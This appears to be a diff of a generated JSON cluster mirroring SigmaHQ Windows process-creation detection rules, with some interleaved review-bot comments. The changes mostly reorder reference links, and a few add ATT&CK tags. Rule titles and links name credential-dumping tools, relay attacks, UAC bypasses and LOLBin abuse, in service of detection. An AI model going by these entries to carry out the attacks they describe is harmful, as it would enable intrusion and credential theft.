+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpresult_execution.yml"
 ],
 "tags": [
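Review bot: The removed line `"tags": "No established tags"` shows that `tags` has been a string sentinel on some entries and an array on the rest, and the same string-to-array replacement recurs in the hunks for the IEX-patterns, X509Enrollment and PE-metadata entries below. Every entry the generator still emits with the sentinel forces consumers of this cluster to check the type before iterating `tags`, which is exactly the kind of shape instability that breaks downstream tooling silently. Emitting `"tags": []` for rules without tags would give the field a single type throughout the file and let the sentinel string be retired for good.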
@@ -66712,10 +67799,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/",
+ "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"
 ],
 "tags": [
@@ -66893,8 +67980,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/bohops/status/1477717351017680899?s=12",
- "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/",
+ "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml"
 ],
 "tags": [
@@ -66917,8 +68004,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
 "https://twitter.com/0gtweet/status/1564968845726580736",
+ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
 "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml"
 ],
@@ -66961,17 +68048,17 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set",
- "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml",
- "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e",
- "https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/",
- "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100",
- "https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html",
- "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A",
- "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html",
 "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml",
- "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
 "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml",
+ "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A",
+ "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml",
+ "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100",
+ "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e",
+ "https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html",
+ "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html",
+ "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set",
+ "https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/",
+ "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_susp_child_processes.yml"
 ],
 "tags": [
@@ -67022,10 +68109,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/Neo23x0/DLLRunner",
 "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/",
- "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
 "https://twitter.com/cyb3rops/status/1186631731543236608",
+ "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
+ "https://github.com/Neo23x0/DLLRunner",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_by_ordinal.yml"
 ],
 "tags": [
@@ -67158,11 +68245,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar",
- "https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic",
 "https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/",
 "https://nwgat.ninja/getting-system-information-with-wmic-on-windows/",
 "https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/",
+ "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar",
+ "https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_system_info_discovery.yml"
 ],
 "tags": [
@@ -67232,8 +68319,20 @@
 "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_iex_patterns.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "09576804-7a05-458e-a817-eb718ca91f54",
 "value": "Suspicious PowerShell IEX Execution Patterns"
 },
@@ -67250,9 +68349,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings",
- "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
 "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
+ "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
+ "https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml"
 ],
 "tags": [
@@ -67285,8 +68384,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/vysecurity/status/977198418354491392",
 "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna",
+ "https://twitter.com/vysecurity/status/977198418354491392",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ping_hex_ip.yml"
 ],
 "tags": [
@@ -67369,10 +68468,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control",
 "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16",
- "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
 "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/",
+ "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control",
+ "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml"
 ],
 "tags": [
@@ -67405,12 +68504,12 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
 "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes",
- "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire",
 "https://github.com/ohpe/juicy-potato",
- "https://www.localpotato.com/",
 "https://pentestlab.blog/2017/04/13/hot-potato/",
+ "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire",
+ "https://www.localpotato.com/",
+ "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml"
 ],
 "tags": [
@@ -67517,8 +68616,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w",
 "https://www.autoitscript.com/site/",
+ "https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_autoit.yml"
 ],
 "tags": [
@@ -67551,11 +68650,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
 "https://twitter.com/Alh4zr3d/status/1580925761996828672",
+ "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
+ "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
 "https://twitter.com/0gtweet/status/1628720819537936386",
 "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
- "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_modification.yml"
 ],
 "tags": [
@@ -67666,8 +68765,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/gN3mes1s/status/1222088214581825540",
- "https://twitter.com/gN3mes1s/status/1222095963789111296",
 "https://twitter.com/gN3mes1s/status/1222095371175911424",
+ "https://twitter.com/gN3mes1s/status/1222095963789111296",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_dctask64.yml"
 ],
 "tags": [
@@ -67747,10 +68846,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script",
 "https://twitter.com/mattifestation/status/1326228491302563846",
- "http://blog.sevagas.com/?Hacking-around-HTA-files",
 "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356",
+ "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script",
+ "http://blog.sevagas.com/?Hacking-around-HTA-files",
 "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_execution.yml"
 ],
@@ -67894,13 +68993,25 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115",
 "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42",
+ "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115",
 "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_x509enrollment.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1553.004"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "114de787-4eb2-48cc-abdb-c0b449f93ea4",
 "value": "Suspicious X509Enrollment - Process Creation"
 },
@@ -67984,8 +69095,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c",
 "https://persistence-info.github.io/Data/wpbbin.html",
+ "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_potential_persistence.yml"
 ],
 "tags": [
@@ -68019,8 +69130,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml"
 ],
 "tags": [
@@ -68086,8 +69197,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options",
 "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
+ "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powercfg_execution.yml"
 ],
 "tags": [
@@ -68111,8 +69222,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md",
 "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml"
 ],
 "tags": [
@@ -68180,8 +69291,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/pabraeken/status/990717080805789697",
- "https://lolbas-project.github.io/lolbas/Binaries/Runonce/",
 "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA",
+ "https://lolbas-project.github.io/lolbas/Binaries/Runonce/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_runonce_execution.yml"
 ],
 "tags": [
@@ -68215,8 +69326,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets",
 "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_encode.yml"
 ],
 "tags": [
@@ -68316,8 +69427,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
- "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
 "https://www.poweradmin.com/paexec/",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml"
 ],
 "tags": [
@@ -68350,8 +69461,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/",
 "https://twitter.com/bohops/status/948061991012327424",
+ "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_invocation.yml"
 ],
 "tags": [
@@ -68384,8 +69495,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18",
 "https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0",
+ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml"
 ],
 "tags": [
@@ -68545,8 +69656,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/quarkslab/quarkspwdump",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east",
+ "https://github.com/quarkslab/quarkspwdump",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml"
 ],
 "tags": [
@@ -68662,8 +69773,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md",
 "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_screensaver.yml"
 ],
 "tags": [
@@ -68771,8 +69882,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md",
 "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml"
 ],
 "tags": [
@@ -68805,8 +69916,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/harr0ey/status/989617817849876488",
 "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/",
+ "https://twitter.com/harr0ey/status/989617817849876488",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwutl.yml"
 ],
 "tags": [
@@ -69065,8 +70176,28 @@
 "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.credential_access",
+ "attack.t1588.002",
+ "attack.t1003"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "37c1333a-a0db-48be-b64b-7393b2386e3b",
 "value": "Suspicious Hacktool Execution - PE Metadata"
 },
@@ -69104,7 +70235,7 @@
 "value": "HackTool - Impacket Tools Execution"
 },
 {
- "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.",
+ "description": "Detects execution of \"rundll32.exe\" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.",
 "meta": {
 "author": "CD_ROM_",
 "creation_date": "2022/05/21",
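Review bot: The `tags` array added for "Suspicious Hacktool Execution - PE Metadata" names `attack.credential_access` as its only tactic, but `attack.t1588.002` (Obtain Capabilities: Tool) sits under the Resource Development tactic, so one of the two technique tags has no matching tactic tag; adding `attack.resource_development` would make the tactic set cover both techniques. Because this cluster mirrors the upstream Sigma rule, the correction most likely belongs in the rule itself and would flow through on the next regeneration rather than being hand-edited here. The two `related` entries do line up one-to-one with the two technique tags, so the technique mapping itself is internally consistent.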
@@ -69116,8 +70247,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://redcanary.com/blog/raspberry-robin/",
 "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://redcanary.com/blog/raspberry-robin/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml"
 ],
 "tags": [
@@ -69125,7 +70256,7 @@
 ]
 },
 "uuid": "1723e720-616d-4ddc-ab02-f7e3685a4713",
- "value": "Rundll32 With Suspicious Parent Process"
+ "value": "Rundll32 Spawned Via Explorer.EXE"
 },
 {
 "description": "Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.",
@@ -69182,8 +70313,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html",
 "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16",
+ "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html",
 "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml"
 ],
@@ -69218,8 +70349,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/sensepost/ruler",
- "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49",
 "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
+ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml"
 ],
 "tags": [
@@ -69260,11 +70391,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png", - "https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/", - "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/", "https://twitter.com/aceresponder/status/1636116096506818562", + "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/", "https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/", + "https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/", + "https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml" ], "tags": [ @@ -69298,8 +70429,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1618021838407495681", "https://twitter.com/nas_bench/status/1618021415852335105", + "https://twitter.com/nas_bench/status/1618021838407495681", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml" ], "tags": [ 
@@ -69408,8 +70539,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", "https://hashcat.net/wiki/doku.php?id=hashcat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_hashcat.yml" ], "tags": [ @@ -69442,8 +70573,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", + "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" ], @@ -69486,9 +70617,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vysecurity/status/974806438316072960", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", + "https://twitter.com/vysecurity/status/974806438316072960", "https://twitter.com/vysecurity/status/873181705024266241", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml" ], 
@@ -69664,8 +70795,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", + "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", "https://github.com/tevora-threat/SharpView/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpview.yml" ], @@ -69731,9 +70862,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/hfiref0x/UACME", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", - "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" ], "tags": [ @@ -69800,8 +70931,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_execution.yml" ], "tags": [ 
